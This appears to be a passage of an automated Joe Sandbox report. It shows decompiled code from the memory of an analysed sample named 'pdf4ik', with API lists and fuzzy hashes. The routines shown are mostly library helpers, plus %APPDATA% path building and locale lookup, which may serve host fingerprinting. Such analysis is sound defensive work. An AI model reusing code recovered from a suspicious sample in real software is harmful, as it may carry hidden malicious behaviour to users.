                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC987,?,?,?), ref: 29DAC3CF
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC987,?,?,?), ref: 29DAC3DD
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC987,?,?,?), ref: 29DAC3F7
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29DAC417
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 568878067-0
                                        • Opcode ID: 3310326056420f0e567c9f6508ce34e1262f882a976d61910b234ec3af33d7af
                                        • Instruction ID: a9e8dd942da5048f27f686c98123ae3619b1d897d8852e6010f994b80451603c
                                        • Opcode Fuzzy Hash: 3310326056420f0e567c9f6508ce34e1262f882a976d61910b234ec3af33d7af
                                        • Instruction Fuzzy Hash: A4411BB29007489FDB18CFA9D890AAEBBF5FF58310F40892EE59AD7740DB70A444DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E29DAC4A0(intOrPtr __edi, intOrPtr __esi) {
                                        				signed int _v8;
                                        				struct _SYSTEMTIME _v24;
                                        				struct _SYSTEMTIME _v40;
                                        				struct _FILETIME _v48;
                                        				struct _FILETIME _v56;
                                        				void* __ebx;
                                        				signed int _t37;
                                        				intOrPtr _t44;
                                        				intOrPtr _t62;
                                        				intOrPtr _t76;
                                        				signed int _t84;
                                        
                                        				_t37 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t37 ^ _t84;
                                        				 *((intOrPtr*)(__esi + 0x7c)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x84)) = 0;
                                        				 *((char*)(__esi + 0x80)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x78)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x90)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x74)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x4c)) = 0x41c00010;
                                        				 *((intOrPtr*)(__esi + 0x70)) = 0;
                                        				 *((char*)(__esi + 0x6c)) = 0;
                                        				GetLocalTime( &_v40);
                                        				SystemTimeToFileTime( &_v40,  &_v48);
                                        				_v56.dwLowDateTime = _v48.dwLowDateTime;
                                        				_v56.dwHighDateTime = _v48.dwHighDateTime;
                                        				FileTimeToSystemTime( &_v56,  &_v24);
                                        				_t76 = _v48.dwHighDateTime;
                                        				asm("sbb edx, 0x19db1de");
                                        				_t44 = E29DB75A0(_v48.dwLowDateTime - 0xd53e8000, _t76, 0x989680, 0);
                                        				 *((intOrPtr*)(__esi + 0x50)) = _t44;
                                        				 *((intOrPtr*)(__esi + 0x58)) = _t44;
                                        				 *((intOrPtr*)(__esi + 0x60)) = _t44;
                                        				_t62 = _t76;
                                        				 *((intOrPtr*)(__esi + 0x5c)) = _t62;
                                        				 *((intOrPtr*)(__esi + 0x64)) = _t62;
                                        				 *((intOrPtr*)(__esi + 0x54)) = _t76;
                                        				 *(__esi + 0x68) = ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f;
                                        				return E29DADF46(0, 0, _v8 ^ _t84, ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f, __edi, __esi);
                                        			}

                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC999,?,?), ref: 29DAC4DF
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC999,?,?), ref: 29DAC4ED
                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,29DAC999,?,?), ref: 29DAC507
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29DAC527
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 568878067-0
                                        • Opcode ID: 194cfa0c8d21d3178253f97d4bffd4cb5ef9b91557098c59c99b83fab75aa215
                                        • Instruction ID: a65ee49fd7584e5dc1a4aa0faf0d408b7c197f5c4797191f61382b38d7c1c9be
                                        • Opcode Fuzzy Hash: 194cfa0c8d21d3178253f97d4bffd4cb5ef9b91557098c59c99b83fab75aa215
                                        • Instruction Fuzzy Hash: 8F311AB1D007089FD719CFA9C990AAAFBF5FB48200B40892EE59AE7750D774A904DB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DBF3D1(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                        				intOrPtr _t25;
                                        				void* _t26;
                                        
                                        				_t25 = _a16;
                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                        					_t26 = E29DBECC3(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        					goto L9;
                                        				} else {
                                        					_t35 = _t25 - 0x66;
                                        					if(_t25 != 0x66) {
                                        						__eflags = _t25 - 0x61;
                                        						if(_t25 == 0x61) {
                                        							L7:
                                        							_t26 = E29DBEDAA(_a4, _a8, _a12, _a20, _a24, _a28);
                                        						} else {
                                        							__eflags = _t25 - 0x41;
                                        							if(__eflags == 0) {
                                        								goto L7;
                                        							} else {
                                        								_t26 = E29DBF2E4(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        							}
                                        						}
                                        						L9:
                                        						return _t26;
                                        					} else {
                                        						return E29DBF223(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                                        					}
                                        				}
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                        • Instruction ID: 1e35597aaaa4b70d3cdf48fd136220bc61f40801dc8172895dac987b3390bfb1
                                        • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                        • Instruction Fuzzy Hash: BD11803200004EBBCF066F89DC21CDE3F66BF58294B448429FA595A931C332C5B2BB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29DA4650(char* __eax, char* _a4, intOrPtr _a8) {
                                        				char* _t10;
                                        				char* _t16;
                                        				char _t17;
                                        				char* _t19;
                                        				char* _t20;
                                        				void* _t21;
                                        				void* _t23;
                                        				CHAR* _t24;
                                        
                                        				_t19 = __eax;
                                        				_t16 = StrStrA(__eax, _a4);
                                        				if(_t16 != 0) {
                                        					_t23 = _t16 - _t19;
                                        					 *0x29dd8498(0x29dd8830, _t19, _t23, _t21);
                                        					_t10 = _a4;
                                        					_t3 = _t23 + 0x29dd8830; // 0x0
                                        					_t24 = _t3;
                                        					 *_t24 = 0;
                                        					_t20 =  &(_t10[1]);
                                        					do {
                                        						_t17 =  *_t10;
                                        						_t10 =  &(_t10[1]);
                                        					} while (_t17 != 0);
                                        					wsprintfA(_t24, "%s%s", _a8, _t10 - _t20 + _t16);
                                        					return 0x29dd8830;
                                        				} else {
                                        					return _t19;
                                        				}
                                        			}

                                        APIs
                                        • StrStrA.SHLWAPI(?,?,000F4240,?,?,29D909A9,%APPDATA%,?), ref: 29DA465C
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000,00000000,?,29D909A9,%APPDATA%,?), ref: 29DA467A
                                        • wsprintfA.USER32 ref: 29DA46A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1799455324-3252725368
                                        • Opcode ID: f6041a07c936746d6609cae34556e469b4aef735f5341e7a049e350d9343300f
                                        • Instruction ID: 55d6ea70373c71c403c2a2cb993a0310c262444c2bdb2adbb7071e45ac708371
                                        • Opcode Fuzzy Hash: f6041a07c936746d6609cae34556e469b4aef735f5341e7a049e350d9343300f
                                        • Instruction Fuzzy Hash: E4F0C8332001556FD7115E5DEC98DEB7B9CDF866A97044129F94CC7701CA61ED06D3B0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E29DA4E00(CHAR* __eax) {
                                        				void* _v8;
                                        				char _v12;
                                        				void* _t7;
                                        				void* _t14;
                                        
                                        				_t14 = CreateFileA(__eax, 0x80000000, 3, 0, 3, 0x80, 0);
                                        				if(_t14 == 0xffffffff) {
                                        					L3:
                                        					return 0;
                                        				} else {
                                        					_t7 =  *0x29dd836c(_t14,  &_v12);
                                        					_push(_t14);
                                        					if(_t7 != 0) {
                                        						CloseHandle();
                                        						return _v12;
                                        					} else {
                                        						CloseHandle();
                                        						goto L3;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,29D90797), ref: 29DA4E1A
                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,29D90797), ref: 29DA4E2C
                                        • CloseHandle.KERNEL32(00000000,?,?,29D90797), ref: 29DA4E37
                                        • CloseHandle.KERNEL32(00000000,?,?,29D90797), ref: 29DA4E46
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandle$CreateSize
                                        • String ID:
                                        • API String ID: 4148174661-0
                                        • Opcode ID: 356853270da570aa574ba2e6423c30f6fb6a1143a518a43d22efae0c58fc0007
                                        • Instruction ID: a597651ef9ae59ecb28d94dc6e2b3b3563424daa6bb625b272fa180ebc3f5a5d
                                        • Opcode Fuzzy Hash: 356853270da570aa574ba2e6423c30f6fb6a1143a518a43d22efae0c58fc0007
                                        • Instruction Fuzzy Hash: 61F0A736681214BBD211F7B9EC0AF9A7BACDF08A60F104255FD09E31C4E674761196E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 81%
                                        			E29DA10B0(void* __ecx, signed int* __edx, signed int _a4) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				signed int _v48;
                                        				signed int _v49;
                                        				char _v56;
                                        				char _v60;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				signed int _t56;
                                        				signed int _t57;
                                        				signed int _t59;
                                        				signed int _t63;
                                        				signed int _t67;
                                        				void* _t69;
                                        				void* _t74;
                                        				signed int* _t78;
                                        				signed int _t80;
                                        				intOrPtr _t81;
                                        				intOrPtr _t82;
                                        				signed int _t86;
                                        				intOrPtr* _t91;
                                        				signed int _t101;
                                        				void* _t107;
                                        				intOrPtr _t108;
                                        				signed int _t111;
                                        				void* _t112;
                                        				intOrPtr _t113;
                                        				signed int _t115;
                                        				signed int _t119;
                                        				signed int _t121;
                                        				void* _t122;
                                        				void* _t123;
                                        
                                        				_t100 = __edx;
                                        				_push(0xffffffff);
                                        				_push(E29DC2158);
                                        				_push( *[fs:0x0]);
                                        				_t123 = _t122 - 0x2c;
                                        				_t56 =  *0x29dd5664; // 0xd9555f04
                                        				_t57 = _t56 ^ _t121;
                                        				_v20 = _t57;
                                        				_push(_t112);
                                        				_push(_t57);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t80 = _a4;
                                        				_t107 = __ecx;
                                        				if(_t80 != 0xffffffff) {
                                        					_t59 =  *(__ecx + 0x24);
                                        					_t86 =  *_t59;
                                        					__eflags = _t86;
                                        					if(_t86 == 0) {
                                        						L5:
                                        						__eflags =  *(_t107 + 0x54);
                                        						if( *(_t107 + 0x54) == 0) {
                                        							L34:
                                        							_t60 = _t59 | 0xffffffff;
                                        							__eflags = _t59 | 0xffffffff;
                                        							L35:
                                        							 *[fs:0x0] = _v16;
                                        							_pop(_t108);
                                        							_pop(_t113);
                                        							_pop(_t81);
                                        							return E29DADF46(_t60, _t81, _v20 ^ _t121, _t100, _t108, _t113);
                                        						}
                                        						_t91 =  *((intOrPtr*)(_t107 + 0x10));
                                        						_t100 = _t107 + 0x48;
                                        						__eflags =  *_t91 - _t107 + 0x48;
                                        						if( *_t91 == _t107 + 0x48) {
                                        							 *_t91 =  *((intOrPtr*)(_t107 + 0x3c));
                                        							 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x20)))) =  *((intOrPtr*)(_t107 + 0x40));
                                        							_t100 =  *((intOrPtr*)(_t107 + 0x30));
                                        							__eflags = 0;
                                        							 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x30)))) = 0;
                                        						}
                                        						__eflags =  *(_t107 + 0x44);
                                        						if(__eflags != 0) {
                                        							_v49 = _t80;
                                        							E29DA19F0( &_v48);
                                        							_v8 = 0;
                                        							while(1) {
                                        								L12:
                                        								_t63 = _v48;
                                        								_t82 = _v28;
                                        								while(1) {
                                        									_t101 = _t63;
                                        									__eflags = _t82 - 0x10;
                                        									if(_t82 < 0x10) {
                                        										_t101 =  &_v48;
                                        										_t63 = _t101;
                                        									}
                                        									_t115 =  *( *(_t107 + 0x44));
                                        									_t100 =  &_v49;
                                        									_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x14))))(_t107 + 0x4c,  &_v49,  &_v48,  &_v60, _t63, _t101 + _v32,  &_v56);
                                        									__eflags = _t67;
                                        									if(_t67 < 0) {
                                        										break;
                                        									}
                                        									__eflags = _t67 - 1;
                                        									if(_t67 > 1) {
                                        										__eflags = _t67 - 3;
                                        										if(__eflags != 0) {
                                        											break;
                                        										}
                                        										_push( *(_t107 + 0x54));
                                        										_push(_v49);
                                        										_t69 = E29DAED78( &_v56,  *(_t107 + 0x54), _t115, __eflags);
                                        										__eflags = _t69 - 0xffffffff;
                                        										if(_t69 == 0xffffffff) {
                                        											E29D89160( &_v48);
                                        											_t60 = _t115 | 0xffffffff;
                                        										} else {
                                        											E29D89160( &_v48);
                                        											_t60 = _a4;
                                        										}
                                        										goto L35;
                                        									}
                                        									_t82 = _v28;
                                        									_t63 = _v48;
                                        									_t96 = _t63;
                                        									__eflags = _t82 - 0x10;
                                        									if(_t82 < 0x10) {
                                        										_t96 =  &_v48;
                                        									}
                                        									_t119 = _v56 - _t96;
                                        									__eflags = _t119;
                                        									if(_t119 == 0) {
                                        										L24:
                                        										_t100 =  &_v49;
                                        										 *((char*)(_t107 + 0x49)) = 1;
                                        										__eflags = _v60 -  &_v49;
                                        										if(_v60 !=  &_v49) {
                                        											E29D89160( &_v48);
                                        											_t60 = _a4;
                                        											goto L35;
                                        										}
                                        										__eflags = _t119;
                                        										if(_t119 != 0) {
                                        											continue;
                                        										}
                                        										__eflags = _v32 - 0x20;
                                        										if(_v32 >= 0x20) {
                                        											break;
                                        										}
                                        										E29D957D0(_t119 + 8, _t96,  &_v48, _t119);
                                        										goto L12;
                                        									} else {
                                        										__eflags = _t82 - 0x10;
                                        										if(__eflags < 0) {
                                        											_t63 =  &_v48;
                                        										}
                                        										_t96 =  *(_t107 + 0x54);
                                        										_push( *(_t107 + 0x54));
                                        										_push(_t119);
                                        										_push(1);
                                        										_push(_t63);
                                        										_t74 = E29DAF99B(_t82, _t100, _t107, _t119, __eflags);
                                        										_t123 = _t123 + 0x10;
                                        										__eflags = _t119 - _t74;
                                        										if(_t119 != _t74) {
                                        											break;
                                        										} else {
                                        											_t82 = _v28;
                                        											_t63 = _v48;
                                        											goto L24;
                                        										}
                                        									}
                                        								}
                                        								_t59 = E29D89160( &_v48);
                                        								goto L34;
                                        							}
                                        						} else {
                                        							_push( *(_t107 + 0x54));
                                        							_push(_t80);
                                        							_t59 = E29DAED78(_t80,  *(_t107 + 0x54), _t112, __eflags);
                                        							__eflags = _t59 - 0xffffffff;
                                        							if(_t59 == 0xffffffff) {
                                        								goto L34;
                                        							}
                                        							_t60 = _t80;
                                        							goto L35;
                                        						}
                                        					}
                                        					_t59 =  *(__ecx + 0x34);
                                        					_t100 =  *_t59 + _t86;
                                        					__eflags = _t86 -  *_t59 + _t86;
                                        					if(_t86 >=  *_t59 + _t86) {
                                        						goto L5;
                                        					}
                                        					 *_t59 =  *_t59 - 1;
                                        					_t111 =  *(__ecx + 0x24);
                                        					_t78 =  *_t111;
                                        					 *_t111 =  &(_t78[0]);
                                        					 *_t78 = _t80;
                                        					_t60 = _t80;
                                        					goto L35;
                                        				}
                                        				_t60 = 0;
                                        				goto L35;
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 33a0e5a042ae45061e4074352c0ecd56507409f23c8a4d634630bc0225cdf780
                                        • Instruction ID: 294f6f06d5bde4d395f922c110204d8002a85b2d77c24365ef9ad8da757e9a40
                                        • Opcode Fuzzy Hash: 33a0e5a042ae45061e4074352c0ecd56507409f23c8a4d634630bc0225cdf780
                                        • Instruction Fuzzy Hash: B051A475A00509AFCB04CF68C8819DEB3B5FF59754F10862ED921A7A80E730F926DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DA41B0(void* __eax, intOrPtr* __ecx, signed int _a4) {
                                        				void* __edi;
                                        				intOrPtr _t18;
                                        				intOrPtr* _t19;
                                        				short* _t26;
                                        				intOrPtr* _t31;
                                        				intOrPtr* _t32;
                                        				signed int _t41;
                                        				void* _t42;
                                        				intOrPtr _t51;
                                        				intOrPtr* _t55;
                                        				void* _t56;
                                        
                                        				_t56 = __eax;
                                        				_t55 = __ecx;
                                        				if(__eax == 0) {
                                        					L12:
                                        					_t41 = _a4;
                                        					if(_t41 > 0x7ffffffe) {
                                        						E29DAD440("string too long");
                                        					}
                                        					_t18 =  *((intOrPtr*)(_t55 + 0x14));
                                        					if(_t18 >= _t41) {
                                        						if(_t41 != 0) {
                                        							goto L16;
                                        						} else {
                                        							 *(_t55 + 0x10) = _t41;
                                        							if(_t18 < 8) {
                                        								_t26 = _t55;
                                        								 *_t26 = 0;
                                        								return _t26;
                                        							} else {
                                        								 *((short*)( *_t55)) = 0;
                                        								return _t55;
                                        							}
                                        						}
                                        					} else {
                                        						E29D97B00(_t55, _t41,  *(_t55 + 0x10));
                                        						if(_t41 == 0) {
                                        							L26:
                                        							return _t55;
                                        						} else {
                                        							L16:
                                        							if( *((intOrPtr*)(_t55 + 0x14)) < 8) {
                                        								_t19 = _t55;
                                        							} else {
                                        								_t19 =  *_t55;
                                        							}
                                        							_t42 = _t41 + _t41;
                                        							E29DB0010(_t19, _t56, _t42);
                                        							 *(_t55 + 0x10) = _a4;
                                        							if( *((intOrPtr*)(_t55 + 0x14)) < 8) {
                                        								 *((short*)(_t42 + _t55)) = 0;
                                        								goto L26;
                                        							} else {
                                        								 *((short*)(_t42 +  *_t55)) = 0;
                                        								return _t55;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					_t51 =  *((intOrPtr*)(__ecx + 0x14));
                                        					if(_t51 < 8) {
                                        						_t31 = __ecx;
                                        					} else {
                                        						_t31 =  *__ecx;
                                        					}
                                        					if(_t56 < _t31) {
                                        						goto L12;
                                        					} else {
                                        						if(_t51 < 8) {
                                        							_t32 = _t55;
                                        						} else {
                                        							_t32 =  *_t55;
                                        						}
                                        						if(_t32 +  *(_t55 + 0x10) * 2 <= _t56) {
                                        							goto L12;
                                        						} else {
                                        							if(_t51 < 8) {
                                        								return E29D97940(_t55, _t55, _t56 - _t55 >> 1);
                                        							} else {
                                        								return E29D97940(_t55, _t55, _t56 -  *_t55 >> 1);
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}















                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA4226
                                        • _memmove.LIBCMT ref: 29DA427C
                                          • Part of subcall function 29D97940: std::_Xinvalid_argument.LIBCPMT ref: 29D97957
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: string too long
                                        • API String ID: 2168136238-2556327735
                                        • Opcode ID: f80515d17c578335d4df051c2ee93d0c4130a532a0470cc872f6cf4219303329
                                        • Instruction ID: 4537543fa4851366f2f81c81549bf1db2632ceb45e340809c8110e5351548d6a
                                        • Opcode Fuzzy Hash: f80515d17c578335d4df051c2ee93d0c4130a532a0470cc872f6cf4219303329
                                        • Instruction Fuzzy Hash: EC316372314115AB4704DF5EE8C0869B3AAFFE5262314563EEA08C7A00D721BC76D7B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 45%
                                        			E29DA3730(intOrPtr* __ecx) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v190;
                                        				char _v192;
                                        				intOrPtr _v200;
                                        				char _v204;
                                        				char _v220;
                                        				signed int _v228;
                                        				char _v232;
                                        				char _v248;
                                        				intOrPtr _v256;
                                        				char _v260;
                                        				char _v276;
                                        				intOrPtr* _v280;
                                        				char _v284;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t45;
                                        				signed int _t46;
                                        				intOrPtr* _t51;
                                        				void* _t57;
                                        				intOrPtr _t72;
                                        				intOrPtr _t76;
                                        				intOrPtr _t90;
                                        				intOrPtr* _t92;
                                        				intOrPtr _t94;
                                        				signed int _t95;
                                        				void* _t96;
                                        				void* _t98;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2091);
                                        				_push( *[fs:0x0]);
                                        				_t45 =  *0x29dd5664; // 0xd9555f04
                                        				_t46 = _t45 ^ _t95;
                                        				_v20 = _t46;
                                        				_push(_t46);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t92 = __ecx;
                                        				_v280 = __ecx;
                                        				_v284 = 0;
                                        				_v200 = 0xf;
                                        				_v204 = 0;
                                        				_v220 = 0;
                                        				_v8 = 0;
                                        				_v192 = 0;
                                        				E29DB5640( &_v190, 0, 0xa8);
                                        				_t98 = _t96 - 0x10c + 0xc;
                                        				_push(0x55);
                                        				_t84 =  &_v192;
                                        				_push( &_v192);
                                        				if( *0x29dd8414() != 0) {
                                        					_t51 =  &_v192;
                                        					_v228 = 7;
                                        					_v232 = 0;
                                        					_v248 = 0;
                                        					_t84 = _t51 + 2;
                                        					do {
                                        						_t76 =  *_t51;
                                        						_t51 = _t51 + 2;
                                        					} while (_t76 != 0);
                                        					E29DA41B0( &_v192,  &_v248, _t51 - _t84 >> 1);
                                        					_v8 = 1;
                                        					_t57 = E29DA48F0( &_v248,  &_v276, _t84);
                                        					_v8 = 2;
                                        					E29D891D0(_t57,  &_v220);
                                        					if(_v256 >= 0x10) {
                                        						_t84 = _v276;
                                        						_push(_v276);
                                        						E29DADF3B();
                                        						_t98 = _t98 + 4;
                                        					}
                                        					_v8 = 0;
                                        					_v256 = 0xf;
                                        					_v260 = 0;
                                        					_v276 = 0;
                                        					if(_v228 >= 8) {
                                        						_push(_v248);
                                        						E29DADF3B();
                                        						_t98 = _t98 + 4;
                                        					}
                                        					_t92 = _v280;
                                        					 *((intOrPtr*)(_t92 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t92 + 0x10)) = 0;
                                        					 *_t92 = 0;
                                        					E29D891D0( &_v220, _t92);
                                        					if(_v200 >= 0x10) {
                                        						_push(_v220);
                                        						goto L11;
                                        					}
                                        				} else {
                                        					 *((intOrPtr*)(_t92 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t92 + 0x10)) = 0;
                                        					 *_t92 = 0;
                                        					E29D892C0(_t92, "Unknown", 7);
                                        					if(_v200 >= 0x10) {
                                        						_push(_v220);
                                        						L11:
                                        						E29DADF3B();
                                        					}
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t90);
                                        				_pop(_t94);
                                        				_pop(_t72);
                                        				return E29DADF46(_t92, _t72, _v20 ^ _t95, _t84, _t90, _t94);
                                        			}



































                                        APIs
                                        • _memset.LIBCMT ref: 29DA379E
                                        • GetUserDefaultLocaleName.KERNEL32(?,00000055,00000010,0000000F,00000000), ref: 29DA37AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DefaultLocaleNameUser_memset
                                        • String ID: Unknown
                                        • API String ID: 3917531957-1654365787
                                        • Opcode ID: 6dde62febb3fd4652edf26438b0446607607ef924566ffc4af57f974bac80bee
                                        • Instruction ID: 9e2892e1713c67abccc623d6d873e21fe95a12f13a8c8a87c404774649df676c
                                        • Opcode Fuzzy Hash: 6dde62febb3fd4652edf26438b0446607607ef924566ffc4af57f974bac80bee
                                        • Instruction Fuzzy Hash: 6D419AB1D00259ABDB24CF68CC81BDAF7B5BF14700F0085EED509A7A40EB746A89DF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D892C0(intOrPtr* __ecx, intOrPtr _a4, signed int _a8) {
                                        				intOrPtr _t15;
                                        				intOrPtr* _t16;
                                        				char* _t22;
                                        				intOrPtr* _t27;
                                        				intOrPtr* _t28;
                                        				intOrPtr _t33;
                                        				intOrPtr _t38;
                                        				signed int _t47;
                                        				intOrPtr* _t52;
                                        
                                        				_t33 = _a4;
                                        				_t52 = __ecx;
                                        				if(_t33 == 0) {
                                        					L12:
                                        					_t47 = _a8;
                                        					if(_t47 > 0xfffffffe) {
                                        						E29DAD440("string too long");
                                        					}
                                        					_t15 =  *((intOrPtr*)(_t52 + 0x14));
                                        					if(_t15 >= _t47) {
                                        						if(_t47 != 0) {
                                        							goto L16;
                                        						} else {
                                        							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
                                        							if(_t15 < 0x10) {
                                        								_t22 = _t52;
                                        								 *_t22 = 0;
                                        								return _t22;
                                        							} else {
                                        								 *((char*)( *_t52)) = 0;
                                        								return _t52;
                                        							}
                                        						}
                                        					} else {
                                        						E29D89750(_t52, _t47,  *((intOrPtr*)(_t52 + 0x10)));
                                        						if(_t47 == 0) {
                                        							L26:
                                        							return _t52;
                                        						} else {
                                        							L16:
                                        							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
                                        								_t16 = _t52;
                                        							} else {
                                        								_t16 =  *_t52;
                                        							}
                                        							E29DB0010(_t16, _t33, _t47);
                                        							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
                                        							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
                                        								 *((char*)(_t52 + _t47)) = 0;
                                        								goto L26;
                                        							} else {
                                        								 *((char*)( *_t52 + _t47)) = 0;
                                        								return _t52;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					_t38 =  *((intOrPtr*)(__ecx + 0x14));
                                        					if(_t38 < 0x10) {
                                        						_t27 = __ecx;
                                        					} else {
                                        						_t27 =  *__ecx;
                                        					}
                                        					if(_t33 < _t27) {
                                        						goto L12;
                                        					} else {
                                        						if(_t38 < 0x10) {
                                        							_t28 = _t52;
                                        						} else {
                                        							_t28 =  *_t52;
                                        						}
